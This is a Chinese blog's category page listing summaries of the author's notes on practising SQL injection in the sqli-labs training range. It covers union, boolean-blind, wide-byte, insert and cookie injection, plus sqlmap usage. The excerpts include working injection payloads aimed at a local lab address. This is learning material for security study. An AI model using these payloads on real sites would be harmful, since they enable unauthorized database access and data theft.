随笔 - 36  文章 - 0  评论 - 0  阅读 - 1431

随笔分类 -  SQL注入

SQL二次注入
摘要:靶场:sqli-labs第二十四关 先注册一个账号 Mysql原始注册语句: insert into users ( username, password) values("test", "123456") 修改账号密码,把之前123456修改123 Mysql原始注册语句: UPDATE user 阅读全文
posted @ 2024-12-25 17:46 Ad1ey 阅读(4) 评论(0) 推荐(0) 编辑
SQL布尔盲注
摘要:靶场环境:sqli-labs第五关 可以使用payload:?id=1 ' and (select count(*) from users)>0 --+ 测试是否存在users这个表 第一步:获取数据库长度 使用length()函数,且盲注必须使用and 例:length(database())=3 阅读全文
posted @ 2024-12-24 21:31 Ad1ey 阅读(10) 评论(0) 推荐(0) 编辑
insert 注入
摘要:insert 注入 如何向数据库插入数据? 原始Mysql插入语句: insert into member(username,pw,sex,phonenum,address,email) valus('user01',123456,1,2,3,4); payload: user01' or upda 阅读全文
posted @ 2024-12-23 21:32 Ad1ey 阅读(6) 评论(0) 推荐(0) 编辑
sql宽字节注入和报错注入
摘要:Msql原始语句:select id,email from member where username='\'' //输入的是 ' 结果变成 payload:1%df' union select 1,database()# 可以看到Msql语句中 \ 已修改:select id,email from 阅读全文
posted @ 2024-12-23 15:41 Ad1ey 阅读(18) 评论(0) 推荐(0) 编辑
sql参数类型注入
摘要:参数类型注入(三种) 1,数字型 (sqli_labs Less2) select * from tony where id=1 select * from tony where id=-1 union select 1,database(),user() ID:-1 union select 1, 阅读全文
posted @ 2024-12-23 14:21 Ad1ey 阅读(11) 评论(0) 推荐(0) 编辑
sql注入中的post注入和cookie注入
摘要:![](https://img2024.cnblogs.com/blog/3554162/202412/3554162-20241223010236665-970264492.png) ![](https://img2024.cnblogs.com/blog/3554162/202412/3554162-20241222235206210-230825209.png) ![](https://im 阅读全文
posted @ 2024-12-22 23:52 Ad1ey 阅读(5) 评论(0) 推荐(0) 编辑
使用hackbar进行跨库注入
摘要:第一步 http://192.168.1.117/sqli-labs/Less-1/?id=' union select 1,2,3 --+ //构建语句 阅读全文
posted @ 2024-12-22 21:53 Ad1ey 阅读(3) 评论(0) 推荐(0) 编辑
使用sqlmap进行联合查询注入要点
摘要:sqlmap -u "http://192.168.1.117/sqli-labs/Less-1/?id=1" --technique=U --dbs -u <目标URL>:指定目标 URL(包括注入点)。 --technique=U:告诉 sqlmap 使用 UNION 注入技术(U 代表 UNI 阅读全文
posted @ 2024-12-20 20:07 Ad1ey 阅读(15) 评论(0) 推荐(0) 编辑
sql注入语句要点
摘要:information_schema 5.0及以上版本系统数据库 information_schema.tables 数据库表名称 information_schema.columns 数据库列名称 information_schema.schemata 存取所有数据库 schema_name. 数 阅读全文
posted @ 2024-12-09 20:00 Ad1ey 阅读(7) 评论(0) 推荐(0) 编辑
mysql开启日志
摘要:mysql.ini修改配置 general_log = 1 general_log_file = "D:/phpstudy/Extensions/MySQL5.7.26/data/mysql.log" 阅读全文
posted @ 2024-12-08 22:56 Ad1ey 阅读(3) 评论(0) 推荐(0) 编辑
sql注入_字符型、数字型判断
摘要:$id 数字型(id=$id) 1 and 1=1 id=1 and 1=1 返回正常 1 and 1=2 id=1 and 1=2 返回错误 1 or 1=1 id= 1 or 1=1 返回正常 1 or 1=2 id=1 or 1=2 返回正常 1' id=1' 返回错误 1' --+ id=1 阅读全文
posted @ 2024-12-08 20:51 Ad1ey 阅读(25) 评论(0) 推荐(0) 编辑
mysql常见渗透命令
摘要:语法格式: Example: 向dvwa数据库下的guestbook数据表插入数据 insert into 表名(字段1,字段2,.......)values(值1,值 2,.......); insert into guestbook(comment,name) values('welcome', 阅读全文
posted @ 2024-12-07 21:26 Ad1ey 阅读(19) 评论(0) 推荐(0) 编辑

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

Powered by: 博客园 Copyright © 2025 Ad1ey
Powered by .NET 9.0 on Kubernetes
点击右上角即可分享
微信分享提示